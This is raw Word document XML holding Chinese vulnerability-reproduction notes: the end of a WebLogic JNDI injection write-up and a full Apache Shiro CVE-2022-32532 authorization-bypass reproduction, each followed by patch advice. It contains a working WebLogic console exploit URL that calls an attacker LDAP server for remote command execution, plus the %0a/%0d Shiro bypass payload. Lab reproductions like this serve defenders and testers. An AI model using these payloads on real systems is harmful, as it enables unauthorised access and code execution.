            <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>192.168.1</w:t>
        </w:r>
        <w:r w:rsidRPr="00173742">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>;</w:t>
        </w:r>
        <w:r w:rsidRPr="00E164E5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>40</w:t>
        </w:r>
        <w:r w:rsidRPr="00173742">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>:1389/Basic/WeblogicEcho;AdminServer%22)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009D3B5F">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要注意</w:t>
      </w:r>
      <w:r w:rsidRPr="009D3B5F">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ldap</w:t>
      </w:r>
      <w:r w:rsidRPr="009D3B5F">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务器地址的第三个分隔符是分号</w:t>
      </w:r>
      <w:r w:rsidRPr="009D3B5F">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DA9864" w14:textId="02E257AB" w:rsidR="005C10A5" w:rsidRDefault="005C10A5" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4049EF32" w14:textId="6BDADAF3" w:rsidR="00173742" w:rsidRP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 w:rsidRPr="00173742">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ldap服务器监听到请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460E9C68" w14:textId="52648A9C" w:rsidR="00173742" w:rsidRDefault="00173742" w:rsidP="00E84785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C869D5" wp14:editId="1590C3DC">
            <wp:extent cx="4999153" cy="355122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BB7E" w14:textId="1A3D6458" w:rsidR="005C10A5" w:rsidRDefault="005C10A5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403F4143" w14:textId="35BD6B64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找一个poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECDA62F" w14:textId="5B38260B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20D2EA6" wp14:editId="6BC40D1E">
            <wp:extent cx="5274310" cy="443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E70" w14:textId="0385DB62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413DF706" w14:textId="51AB4360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尝试利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32448ED8" w14:textId="04CBE1F5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79D3221" wp14:editId="2498FC7F">
            <wp:extent cx="3977985" cy="1783235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22D6" w14:textId="65BD5BD3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C78AD42" wp14:editId="2C9B88BB">
            <wp:extent cx="4778154" cy="341405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B63B" w14:textId="38ABD934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命令成功执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B86B45" w14:textId="6172F399" w:rsid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11F82BB9" w14:textId="78B20456" w:rsidR="009D3B5F" w:rsidRDefault="009D3B5F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605D56EB" w14:textId="7830CF8E" w:rsidR="009D3B5F" w:rsidRDefault="009D3B5F" w:rsidP="00E8478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修复方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026050E7" w14:textId="77777777" w:rsidR="009D3B5F" w:rsidRDefault="009D3B5F" w:rsidP="009D3B5F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>、由于是通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>JNDI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>注入进行远程命令执行，所以受到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>版本的影响，建议升级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Weblogic Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>运行环境的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440C57A7" w14:textId="77777777" w:rsidR="009D3B5F" w:rsidRDefault="009D3B5F" w:rsidP="009D3B5F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>、更新最新补丁，参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>官网发布的补丁：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288B822E" w14:textId="77777777" w:rsidR="009D3B5F" w:rsidRDefault="009D3B5F" w:rsidP="009D3B5F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="微软雅黑" w:hAnsi="inherit"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>https://www.oracle.com/security-alerts/cpujan2021.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03976CEE" w14:textId="77777777" w:rsidR="009D3B5F" w:rsidRPr="009D3B5F" w:rsidRDefault="009D3B5F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79FA5ACC" w14:textId="77777777" w:rsidR="00173742" w:rsidRPr="00173742" w:rsidRDefault="00173742" w:rsidP="00E8478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312EBC7F" w14:textId="6902147F" w:rsidR="00173742" w:rsidRDefault="00173742" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD94D77" w14:textId="1E7D9557" w:rsidR="00173742" w:rsidRDefault="00173742" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D6EC8B" w14:textId="77777777" w:rsidR="00173742" w:rsidRDefault="00173742" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D384849" w14:textId="383A1001" w:rsidR="005C10A5" w:rsidRDefault="005C10A5" w:rsidP="005C10A5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="OpenSans-Regular"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C10A5">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="OpenSans-Regular"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Apache Shiro</w:t>
      </w:r>
      <w:r w:rsidRPr="005C10A5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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidRPr="005C10A5">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="OpenSans-Regular"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2022-32532</w:t>
      </w:r>
      <w:r w:rsidRPr="005C10A5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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62186682" w14:textId="77777777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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>一、漏洞简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D21719A" w14:textId="77777777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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>​</w:t>
      </w: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 xml:space="preserve"> Apache Shiro 是一个强大且易用的 Java 安全框架，通过它可以执行身份验证、授权、密码和会话管理。使用 Shiro 的易用 API，您可以快速、轻松地保护任何应用程序 —— 从最小的移动应用程序到最大的 WEB 和企业应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F44746" w14:textId="670FFBC2" w:rsid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>2022年6月29日，Apache官方披露Apache Shiro权限绕过漏洞(CVE-2022-32532)，当Apache Shiro中使用RegexRequestMatcher进行权限配置，且正则表达式中携带"."时，未经授权的远程攻击者可通过构造恶意数据包绕过身份认证，导致配置的权限验证失效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39552CA2" w14:textId="6106E7B7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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>二、漏洞编号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324F9487" w14:textId="5159898A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>CVE-2022-32532</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3201CED8" w14:textId="77777777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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>三、影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782942F8" w14:textId="235FA129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>Apache Shiro &lt; 1.9.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FB0CD7" w14:textId="77777777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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>四、</w:t>
      </w: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>Fofa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A727082" w14:textId="414E31A0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>"Apache Shiro"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4353158D" w14:textId="77777777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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>五、漏洞检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2684C856" w14:textId="656E9265" w:rsidR="006E5A1E" w:rsidRPr="006E5A1E" w:rsidRDefault="006E5A1E" w:rsidP="006E5A1E">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="006E5A1E">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="OpenSans-Regular" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5A1E">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="OpenSans-Regular"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>config\pom.xml的version标签中查看当前使用的shiro版本号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF53C50" w14:textId="75393849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lastRenderedPageBreak/>
        <w:t>六、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AC1A5A" w14:textId="30113A45" w:rsidR="005C10A5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搭建靶场</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171CFDB1" w14:textId="52A907B0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A16686A" wp14:editId="1D409BE3">
            <wp:extent cx="5274310" cy="2609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DBEE" w14:textId="53213023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拦截请求包,发送到repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65973B18" w14:textId="724BC06D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F21FA26" wp14:editId="52CFC74F">
            <wp:extent cx="5274310" cy="3724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6D8D" w14:textId="59A26CA4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472EBE9F" w14:textId="6195AF25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直接发送一个请求试试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D1534" w14:textId="3D8B35A6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AE05BD" wp14:editId="34ABCAAE">
            <wp:extent cx="5274310" cy="3206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033D" w14:textId="5D71BD1D" w:rsidR="006E5A1E" w:rsidRDefault="006E5A1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将请求的资源路径改为</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5A1E">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/permit/any</w:t>
      </w:r>
      <w:r w:rsidR="008A020E">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r w:rsidR="008A020E">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>请求失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE2942C" w14:textId="6F70E856" w:rsidR="006E5A1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5689FB" wp14:editId="476B1EAF">
            <wp:extent cx="5274310" cy="2458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0D2C" w14:textId="08B2FCCE" w:rsidR="008A020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559913E5" w14:textId="7AE2E4F7" w:rsidR="008A020E" w:rsidRPr="0096562E" w:rsidRDefault="008A020E" w:rsidP="005C10A5">
      <w:pPr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使用%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>进行权限绕过</w:t>
      </w:r>
      <w:r w:rsidR="0096562E">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0096562E">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   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注意踩坑:实际payload是%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>0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a或者%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>0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d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 xml:space="preserve">    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此处能success是因为any和admin开头都带了a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 xml:space="preserve">    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实际payload是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>%0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a或%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>0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d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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0096562E">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>即回车或换行</w:t>
      </w:r>
      <w:r w:rsidR="0096562E">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFDD017" w14:textId="6B052ACE" w:rsidR="008A020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599F29" wp14:editId="0BBA8C39">
            <wp:extent cx="5274310" cy="2411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1CA" w14:textId="54219950" w:rsidR="008A020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80373D9" wp14:editId="0282848E">
            <wp:extent cx="5274310" cy="2318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E30" w14:textId="6423F1C2" w:rsidR="008A020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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FE85D5" w14:textId="2C610B81" w:rsidR="008A020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</w:p>
    <w:p w14:paraId="22032683" w14:textId="2082271A" w:rsidR="008A020E" w:rsidRPr="008A020E" w:rsidRDefault="008A020E" w:rsidP="005C10A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A020E">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>修复方式:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F59DB3" w14:textId="288D7C0D" w:rsidR="008A020E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  <w:r w:rsidRPr="008A020E">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>尽快升级至Apache Shiro 1.9.1及以上版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4D0033" w14:textId="77777777" w:rsidR="008A020E" w:rsidRPr="005C10A5" w:rsidRDefault="008A020E" w:rsidP="005C10A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008A020E" w:rsidRPr="005C1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ela Round">
    <w:charset w:val="B1"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="20000807" w:usb1="00000003" w:usb2="00000000" w:usb3="00000000" w:csb0="000001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Sans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C79C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB8C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0844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4BB"/>
    <w:rsid w:val="00132978"/>
    <w:rsid w:val="00173742"/>
    <w:rsid w:val="004C1C51"/>
    <w:rsid w:val="005544BB"/>
    <w:rsid w:val="005C10A5"/>
    <w:rsid w:val="006E5A1E"/>
    <w:rsid w:val="00867EF2"/>
    <w:rsid w:val="008A020E"/>
    <w:rsid w:val="0096562E"/>
    <w:rsid w:val="009D3B5F"/>
    <w:rsid w:val="00CA417B"/>
    <w:rsid w:val="00E84785"/>
    <w:rsid w:val="00EE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E59BA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{64FE0EA3-02DC-47ED-906F-CC1E492F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8478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478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478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84785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8A020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737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3742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9D3B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4478">
          <w:marLeft w:val="18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92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5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92.168.1.36:54092/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&amp;_nfpb=true&amp;JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.1;40:1389/Basic/WeblogicEcho;AdminServer%22)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l1ex/CVE-2021-22205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He</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-09T11:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-10T02:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>